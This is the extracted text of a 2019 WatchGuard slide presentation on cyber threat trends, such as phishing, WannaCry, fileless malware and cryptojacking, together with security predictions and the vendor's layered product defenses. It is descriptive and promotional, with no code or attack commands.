1/15/2019
1
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
2019 Security Trends & Predictions
Defending Against Future Cyber Attacks
Corey Nachreiner, CISSP, CTO
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Agenda
Threat Landscape Statistics
– General attack statistics
– WatchGuard’s Internet Security Report
2018 Top Cyber Threats
– Five cyber threats to watch out for
2019 Predictions
Defense Summary
2
1/15/2019
2
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Threat Landscape by the Numbers
3
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Endless Data Breaches (2018 H1)
4
1/15/2019
3
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Breach Costs Rise Slightly
5
2018 Cost of Data Breach Study
Avg. cost per breach
Avg. cost per breach
Avg. cost per record
Avg. cost per record
Cost increase
Cost increase
Record cost
increase
Record cost
increase
$3.86M
$148
6.2%
4.7%
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Companies Slow to Detect and Contain
6
* Ponemon’s 2018 Cost of a Data Breach Report
1/15/2019
4
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
WatchGuard’s Quarterly Internet Security Reports
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Q2 2018 Malware Trends
1/15/2019
5
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
1. Dynamic date ranges
2. Filter by region or country
3. Filter by malware / network attacks
4. More features coming…• Map with attack source• Filter by City• Top Malware domains/URLs• Etc…
https://www.secplicity.org/threat-landscape/
New Dynamic ISR Threat Landscape Page
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Top Cyber Threats
10
1/15/2019
6
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Spear Phishing
Ransomworms
Fileless Malware
Crypto Hacking
Password Leaks
5 Threats to Beware of in 2018
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
12
1/15/2019
7
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Phishing – luring a victim into giving up credentials or doing something via a legitimate seeming email
Spear-phishing – A more customized phishing email that targets a specific individual or group
Whaling – spear-phishing that targets C-levels
Flavors of Phishing
Old phishing example:• Not individualized• Bulk recipients• Uses real assets• Malicious document
Spear-phishing example:• Personalized to me• Fits my job role• Understands business
relationships• Sender makes sense in
context• Malicious attachment fits
context
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Users Still Click Phishing Emails
1/15/2019
8
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Focus on phishing TrainingDNSWatch Filtering
Prevention: DNS Blocking & Awareness Training
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
16
1/15/2019
9
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
What is a RansomWORM?
17
Ransomware is a form of malware that encrypts your files and demands you pay a ransom.
A Worm is a type malware that spreads automatically over your network.
A Ransomworm is extremely nasty ransomware that spreads to many computers in your network
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Emerged Friday, May 12th , 2017
Started in Europe
– NHS, UK (40+ locations)
– Telefonica, Spain
– Deutsche Bahn
– Fedex, US
Strong 2048-bit encryption
Leaked NSA exploit (MS17-010)
~400,000 global victims
~$300-600 ransom (bitcoin)
Mostly Windows 7
Estimated $4 billion in loses
Many copycat variants have emerged
WannaCry: Ransomworm Spreads Globally
1/15/2019
10
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
WannaCry Still Spreading as of Mar. 2018
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
New Ransomware Hobbles City
1/15/2019
11
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Virtualizes a full victim system
Runs unknown content in protected environment
Analyzes behaviors
Detects sandbox evasion
Tracks additional malware and C&Cs
OS Virtualization
Prevention: Advanced Malware Detection
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
22
1/15/2019
12
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
A fileless infection or filelessmalware is a threat that ONLY
loads malicious code in memory, rather than installing it on the victim’s hard drive.
Fileless Malware:
Is harder for traditional AV to catch
Tends to inject normal processes on your computer
Often leverages Powershell and scripts
Typically arrives in two ways:
1. Exploits a software vulnerability on your computer
2. Can arrive as a document (a file), that runs a script
What is Fileless Malware?
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved* Ponemon Institute’s “The 2017 State of Endpoint Security Risk Report”
77% of attacks that successfully compromised organizations in 2017 utilized fileless techniques - Ponemon Institute
Fileless malware attacks accounted for 52% of all attacks in 2017 - Carbon Black
Fileless Malware Growing
1/15/2019
13
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Word DDE Attacks (ISR Example)
Macro-less Word malware abuses
Microsoft’s Dynamic Data Execution
(DDE) features to executed code on a victim computer.
Example:
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Example of code in one Word doc:
Downloads obfuscated code DECODED
DDE Attacks Increase Q4 2017
1/15/2019
14
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prevention: Detection & Response
• ThreatSync TI identifies known malicious processes
• Dynamic process heuristics finds suspicious processes
• HRP behavior detection could help too
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
28
1/15/2019
15
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Cryptocurrencies Rocket in Value
29
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Cyber Criminals Target Anything with Value
How cyber criminals user cryptocurrency1. Used for ”anonymous” ransom currency
2. Target online cryptocurrency wallets
3. Find and steal cryptocurrency directly from victim computers
4. CryptoJacking
Cryptojacking is hijacking a victim’s compute resource to mine cryptocurrency without the victim’s knowledge.
Hidden script on web sites Malware payloads
1/15/2019
16
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Protection: Intelligent AV
By monitoring tens of millions of benign and malicious files
using machine learning and artificial intelligence,
WatchGuard and predictively identify zero day malware!
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
32
1/15/2019
17
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Identities Are on the Loose…
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
WatchGuard ISR: .GOV & .MIL Analysis
34
• Leaked .gov passwords = 380077 • Leaked .mil passwords = 503878
Do government and military organizations use password security best practices?
Combined, only .07% of these addresses used one of the 50 most common passwords.
Most, however, didn’t use sufficiently long passwords
1/15/2019
18
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
61%
39%
81%
19%2015 2016
Breaches that Leveraged Either Stolen and/or Weak Passwords
Source: Verizon Data Breach Investigations Report
SMBs Really Need MFA
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Employee PC and network login
Remote access
Privileged users access
Access to cloud services (SaaS)
Easy multi-factor authentication (MFA) for:
Prevention: MFA Secures Authentication
1/15/2019
19
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
2019 Security Predictions
37
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
2019 Security Predictions Intro
38
1/15/2019
20
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #1: AI-Driven Chatbots Go Rogue
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #2: Ransomware Targets ICS
1/15/2019
21
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #3: UN Cyber Security Treaty
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #4: “Fire Sale” from Fiction to Reality
Finance Communications Utilities & ICS
Die Hard 4 depicted a “fire sale” which is a
three-stage coordinated attack on a country's transportation, telecommunications, financial, and utilities infrastructure systems.
1/15/2019
22
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #5: Vaporworms Proliferate (Fileless Worms)
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #6: Wi-Fi Hacks Still Affect WPA3
1/15/2019
23
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Prediction #7: 1FA Biometrics Get Hacked
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Defense Summary
46
1/15/2019
24
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
DELIVERYThe attack payload is delivered through the network perimeter
RECONNAISSANCEThe attacker gathers information on the victim
47
Cyber Kill Chain 3.0
COMPROMISE/ EXPLOITVulnerabilities from reconnaissance stage are exploited to launch an attack
OBJECTIVES/ EXFILTRATIONThe goal of the attack is accomplished
INFECTION/ INSTALLATIONThe attack payload is installed on the
system and persistence is obtained
LATERAL MOVEMENT/ PIVOTINGThe attacker moves behind the network
perimeter to their final target
COMMAND AND CONTROLThe attack payload calls home for instructions
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
WatchGuard Breaks the KillChain
Packet Filtering
Proxies
IPS APT Blocker
Gateway AntiVirus
Packet Filtering
IPS APT Blocker
Gateway AntiVirus
DLPApplication Control
Reputation Enabled Defense
Application Control
Packet Filtering
Web Blocker
IPS APT Blocker
Gateway AntiVirus
Reputation Enabled Defense
RECONNAISSANCE
COMPROMISE/ EXPLOIT
COMMAND AND CONTROL
OBJECTIVES/ EXFILTRATION
DELIVERY
INFECTION/ INSTALLATION
LATERAL MOVEMENT/PIVOTING
APT Blocker
Gateway AntiVirus
TDR
IPSWebBlocker
TDR Botnet Protection
Packet Filtering
DLP Botnet Protection
1/15/2019
25
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Summary of Defenses
UTM Layered Defense
• No single security service prevents all threats. UTM combines many services to offer Kill Chain defenses.
APT Blocker
• Ransomware is evasive and fast changing. You need behavioral malware detection to catch the latest variants.
Threat Detection and Response
• As a last defense, TDR’s Host Ransomware Prevention can stop some ransomware from encrypting files on an end point.
AuthPoint MFA• No single factor of authentication is perfect. Passwords can
leak, tokens can be stolen, and biometrics can be copied.
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
Thank You